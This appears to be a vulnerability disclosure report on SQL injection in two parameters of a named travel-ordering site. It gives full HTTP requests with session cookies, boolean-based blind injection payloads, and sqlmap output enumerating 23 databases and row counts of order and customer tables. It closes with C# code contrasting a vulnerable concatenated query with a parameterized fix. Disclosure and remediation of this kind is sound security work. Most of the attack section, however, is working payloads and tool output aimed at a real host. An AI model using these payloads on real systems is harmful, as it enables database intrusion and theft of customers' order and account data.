Multiple SQL injections at the main site of AVIC Tesco leak millions of orders
1. Injection point: the platformname parameter of PlateServeWallNew.aspx

POST /NewEdition/ServeWall/PlateServeWallNew.aspx?0.7027233010157943&platformname=e HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.rtpnr.com
Cookie: ASP.NET_SessionId=1vofiirwz12vru45ppck0kbx; CheckCode=7036
Host: www.rtpnr.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Type=LoadData

Test payloads for platformname (the two conditions are false and true respectively; the responses differ, which confirms boolean-based blind injection):

e%' AND 3*2=5 AND '000nktz'!='000nktz%
e%' AND 3*2=6 AND '000nktz'!='000nktz%

2. Injection point: the PlatformCode parameter in the POST body

POST /NewEdition/ServeWall/PlateServeWallNew.aspx?0.987686010543257 HTTP/1.1
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.rtpnr.com
Cookie: ASP.NET_SessionId=1vofiirwz12vru45ppck0kbx; CheckCode=7036
Host: www.rtpnr.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

PlatformCode=HB'%20AND%203*2*1%3d6%20AND%20'000Jc9s'%3d'000Jc9s&Type=LoadPlatformStar
sqlmap output for the first injection point:

---
Parameter: platformname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: 0.7027233010157943&platformname=e%' AND 1645=1645 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] AutoTicket
[*] BACKUP
[*] distribution
[*] master
[*] model
[*] MonitorBlocking
[*] msdb
[*] Temp2015
[*] tempdb
[*] tslwp
[*] YeeGo_BackUp
[*] YeeGo_History
[*] YeeGo_Order
[*] YeeGoCopy
[*] YeeGoLog
[*] YeeGoTemp
[*] YeeGoUser
[*] YeeSkyBillings
[*] YeeSkyGo_TEST
[*] YeeSkyGoLog_History
[*] Yeesoho_test
[*] YSK_SAAS_History
[*] YSK_SAAS_TEST

Row counts of the order log tables (one table per day, each holding three to five million entries):

Database: AutoTicket
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| dbo.T_ReceivingOrder_Log_20150509 | 4828407 |
| dbo.T_ReceivingOrder_Log_20150505 | 4761384 |
| dbo.T_ReceivingOrder_Log_20150506 | 4725686 |
| dbo.T_ReceivingOrder_Log_20150427 | 4679033 |
| dbo.T_ReceivingOrder_Log_20150503 | 4663783 |
| dbo.T_ReceivingOrder_Log_20150501 | 4661247 |
| dbo.T_ReceivingOrder_Log_20150417 | 4615511 |
| dbo.T_ReceivingOrder_Log_20150416 | 4578616 |
| dbo.T_ReceivingOrder_Log_20150423 | 4555551 |
| dbo.T_ReceivingOrder_Log_20150508 | 4537936 |
| dbo.T_ReceivingOrder_Log_20150504 | 4529144 |
| dbo.T_ReceivingOrder_Log_20150502 | 4513908 |
| dbo.T_ReceivingOrder_Log_20150428 | 4458769 |
| dbo.T_ReceivingOrder_Log_20150424 | 4426906 |
| dbo.T_ReceivingOrder_Log_20150430 | 4404906 |
| dbo.T_ReceivingOrder_Log_20150325 | 4386799 |
| dbo.T_ReceivingOrder_Log_20150429 | 4357274 |
| dbo.T_ReceivingOrder_Log_20150421 | 4356534 |
| dbo.T_ReceivingOrder_Log_20150418 | 4344581 |
| dbo.T_ReceivingOrder_Log_20150425 | 4338758 |
| dbo.T_ReceivingOrder_Log_20150419 | 4330283 |
| dbo.T_ReceivingOrder_Log_20150420 | 4322006 |
| dbo.T_ReceivingOrder_Log_20150320 | 4313560 |
| dbo.T_ReceivingOrder_Log_20150319 | 4276456 |
| dbo.T_ReceivingOrder_Log_20150311 | 4275833 |
| dbo.T_ReceivingOrder_Log_20150422 | 4270772 |
| dbo.T_ReceivingOrder_Log_20150426 | 4245304 |
| dbo.T_ReceivingOrder_Log_20141230 | 4209479 |
| dbo.T_ReceivingOrder_Log_20150321 | 4192467 |
| dbo.T_ReceivingOrder_Log_20150415 | 4150012 |
| dbo.T_ReceivingOrder_Log_20150507 | 4137469 |
| dbo.T_ReceivingOrder_Log_20150326 | 4117875 |
| dbo.T_ReceivingOrder_Log_20150324 | 4104741 |
| dbo.T_ReceivingOrder_Log_20150403 | 4084876 |
| dbo.T_ReceivingOrder_Log_20150318 | 4070910 |
| dbo.T_ReceivingOrder_Log_20150414 | 4046374 |
| dbo.T_ReceivingOrder_Log_20141231 | 4036910 |
| dbo.T_ReceivingOrder_Log_20150312 | 4000171 |
| dbo.T_ReceivingOrder_Log_20150402 | 3998813 |
| dbo.T_ReceivingOrder_Log_20150322 | 3946956 |
| dbo.T_ReceivingOrder_Log_20150323 | 3929905 |
| dbo.T_ReceivingOrder_Log_20150327 | 3913425 |
| dbo.T_ReceivingOrder_Log_20150331 | 3906339 |
| dbo.T_ReceivingOrder_Log_20150317 | 3898811 |
| dbo.T_ReceivingOrder_Log_20150409 | 3897456 |
| dbo.T_ReceivingOrder_Log_20150413 | 3888902 |
| dbo.T_ReceivingOrder_Log_20150328 | 3885350 |
| dbo.T_ReceivingOrder_Log_20150408 | 3877437 |
| dbo.T_ReceivingOrder_Log_20150411 | 3821738 |
| dbo.T_ReceivingOrder_Log_20150330 | 3817518 |
| dbo.T_ReceivingOrder_Log_20150313 | 3813373 |
| dbo.T_ReceivingOrder_Log_20150407 | 3801984 |
| dbo.T_ReceivingOrder_Log_20150412 | 3798156 |
| dbo.T_ReceivingOrder_Log_20150401 | 3784647 |
| dbo.T_ReceivingOrder_Log_20141229 | 3770215 |
| dbo.T_ReceivingOrder_Log_20150329 | 3758350 |
| dbo.T_ReceivingOrder_Log_20150314 | 3715299 |
| dbo.T_ReceivingOrder_Log_20150316 | 3709434 |
| dbo.T_ReceivingOrder_Log_20150406 | 3699308 |
| dbo.T_ReceivingOrder_Log_20150404 | 3670486 |
| dbo.T_ReceivingOrder_Log_20150315 | 3621205 |
| dbo.T_ReceivingOrder_Log_20150405 | 3573067 |
| dbo.T_ReceivingOrder_Log_20150410 | 3545505 |
| dbo.T_ReceivingOrder_Log_20150510 | 3265968 |
+-----------------------------------+---------+

Row counts of the customer and user tables:

Database: YeeGoUser
+-------------------------------------+---------+
| Table                               | Entries |
+-------------------------------------+---------+
| dbo.V_Customer_PlatformInfo         | 89126   |
| dbo.T_Application_Platform          | 20165   |
| dbo.T_WorkOrder_PlatformApplication | 13600   |
| dbo.VW_CW_CusWorkOrder_YeeGo        | 11295   |
| dbo.V_CustomerUserInfo              | 8399    |
| dbo.S_CusInfo_SalesManager          | 7011    |
| dbo.V_User_Permission               | 5584    |
| dbo.VW_YeeGo_UserLogin              | 5361    |
| dbo.T_Customer_Application_Account  | 4364    |
| dbo.V_CusApplyInfo                  | 4345    |
| dbo.S_CusInfo_ContactPerson         | 4292    |
| dbo.V_CustomerInfo_ExportUser       | 3959    |
| dbo.SC_UserLogin                    | 3883    |
| dbo.SC_UserBasicData                | 3729    |
| dbo.VW_PDAction                     | 3641    |
| dbo.VW_SC_UserLogin_YeeGo           | 3641    |
| dbo.T_CustomerID                    | 2503    |
| dbo.SC_UserPermission               | 2312    |
| dbo.T_PDActiveBak                   | 1990    |
| dbo.V_CustomerAccount               | 1897    |
| dbo.T_WorkOrderRemark               | 1573    |
| dbo.T_CustomerFlag_logs             | 836     |
| dbo.SC_Role_Permission              | 794     |
| dbo.SC_Permission                   | 160     |
| dbo.T_WorkOrder_QuestionType        | 12      |
| dbo.T_WorkOrder_ContactType         | 10      |
| dbo.V_WorkOrder_ContactType         | 10      |
| dbo.T_WorkOrder_ContactPurpose      | 9       |
+-------------------------------------+---------+
Solution:
Filter the platformname and PlatformCode values before they reach the SQL query.
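As an added illustration of that fix (this is not the site's code, which the report does not show), the C# below assumes the handler builds a LIKE query from platformname, and shows the string-concatenated form that produces this injection next to the parameterized form that closes it; the table and column names are borrowed from the report's table listing and are assumptions about the schema.

```csharp
// Added example, not the site's code: the handler is assumed to build a LIKE
// query from platformname, which the e%' ... % test payloads suggest.
using System.Data;
using System.Data.SqlClient;

public static class PlatformLookup
{
    // Vulnerable form (assumed): the user-controlled value is pasted into the
    // SQL text, so e%' AND 3*2=6 AND '000nktz'!='000nktz% closes the string
    // literal and the appended conditions are evaluated by SQL Server.
    public static DataTable LoadDataUnsafe(string platformName, string connStr)
    {
        string sql = "SELECT PlatformCode, PlatformName FROM T_Application_Platform "
                   + "WHERE PlatformName LIKE '%" + platformName + "%'";
        using (var conn = new SqlConnection(connStr))
        using (var da = new SqlDataAdapter(sql, conn))
        {
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // Hardened form: the value is sent as a typed parameter, never as SQL text,
    // so quotes and AND clauses stay inside the pattern. LIKE wildcards typed by
    // the user are escaped so they match literally instead of widening the search.
    public static DataTable LoadDataSafe(string platformName, string connStr)
    {
        const string sql = "SELECT PlatformCode, PlatformName FROM T_Application_Platform "
                         + "WHERE PlatformName LIKE @pattern ESCAPE '\\'";
        string pattern = "%" + EscapeLike(platformName) + "%";
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 100).Value = pattern;
            var dt = new DataTable();
            using (var da = new SqlDataAdapter(cmd))
            {
                da.Fill(dt);
            }
            return dt;
        }
    }

    // Escape the LIKE metacharacters of SQL Server (%, _, [) and the escape char.
    public static string EscapeLike(string s)
    {
        return s.Replace("\\", "\\\\").Replace("%", "\\%")
                .Replace("_", "\\_").Replace("[", "\\[");
    }
}
```

The same change applies to the PlatformCode parameter of the LoadPlatformStar request: it must reach SqlCommand only as a parameter value.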